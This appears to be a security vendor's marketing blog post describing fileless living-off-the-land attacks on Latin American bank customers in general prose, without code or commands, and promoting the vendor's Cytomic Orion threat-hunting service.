Financial institutions in several Latin American countries are concerned about their cybersecurity. And not without reason: many of their customers are falling victim to cyberattacks that aim to steal their credentials. And, more worrying still, these attacks are being carried out without any kind of file. To do this, cybercriminals use a sophisticated cyberattack model with several phases:
1.- Intrusion. The malware connects to a URL to download PowerShell codes, and modifies the name of the files to make them seem like totally legitimate operating system files. PowerShell is a Windows tool that is generally used to dump credentials.
2.- Deception. This malware then forces the affected computer to restart, and then shows a fake lock screen. This is how the attackers are able to steal the access credentials.
3.- Spread In the next step, the cyberattacker accesses several tools on the victim’s computer in order to gather email addresses and gain administrator privileges.
4.- Blocking. Once it has signed in, the malware downloads new intrusion tools that take over the device, then accesses the user’s browser history in order to steal and distribute the victim’s bank credentials.
These banks are not the first to fall prey to similar problems. In 2017, over 100 banks worldwide were hit by a piece of malware called Duqu 2.0. This malware was similar, in that it wasn’t inserted into files, but rather into the RAM of victim computers. Once more, the aim was to get hold of system administrator credentials to gain access to the server controls of financial institutions and, from there, carry out their actions without being discovered.
Financial institutions are one of the worst hit sectors when it comes to this kind of trend. According to an Accenture report, 42% of cyberattacks on financial entities manage to remain hidden for around one week before being detected. Worse still, statistics from the IMF suggest that losses from this kind of cyberattack are between 10% and 30% of annual net turnover.
The key: attack without being discovered_
Any kind of attack is a problem for an organization’s corporate cybersecurity. However, this kind of case poses another challenge: traditional cybersecurity solutions are unable to detect these cyberattacks.
There are two factors that have a hand in this. Firstly, the lack of files means that these solutions cannot locate the attack and classify it as a threat. The result is that its actions remain invisible. Secondly, the cyberattack uses totally legitimate IT system tools to carry out the intrusion. It will therefore not be possible to pick up these actions in a traditional threat analysis.
This is the main problem of Living-off-the-Land (LotL) attacks. The factors that many cybersecurity solutions usually analyze (links to a file or use of illegitimate tools) won’t be present in this case, and as a result cybercriminals will be able to act without being detected. There are even cases in which the infection is active for months on end before striking the final blow that reveals its presence.
The consequences for a bank_
Any company that comes under attack from fileless malware is susceptible to dire consequences. It may, though, be banks that are the most vulnerable victims, given that the range of problems and financial ramifications increases exponentially compared to other kinds of companies.
To begin with, when a cyberattack like this targets a bank’s customers, it can lead not just to credential theft, but also fraud and the theft of money, all of which are a logistical and reputational nightmare for the company. And if the attack targets the bank itself, the outcome will be even worse. The entity could lose business, as well as funds, credentials, control of the IT system, and even the confidential information belonging to the organization.
How to avoid these cyberattacks_
To avoid fileless malware attacks and the damage they can cause, we created Cytomic Orion, our Threat Hunting and Incident Response solution. Cytomic Orion responds to Living-off-the-Land attacks via the managed service Zero-Trust App Service. Cytomic Orion focuses exclusively on Living-off-the-Land techniques with the managed Zero-Trust App service. With this service, a Zero-Trust approach is given to applications that try to run on endpoints. They are blocked, and not allowed to run until they are fully validated. This way, fileless malware such as Duqu can be detected and neutralized.
These days, cyberattacks no longer need to use infected attachments in emails or other such traditional threats. Therefore, the only way to ensure total protection of the system is to analyze its internal workings, parameterize possible dangerous behaviors, and eliminate any possible threat as soon as possible.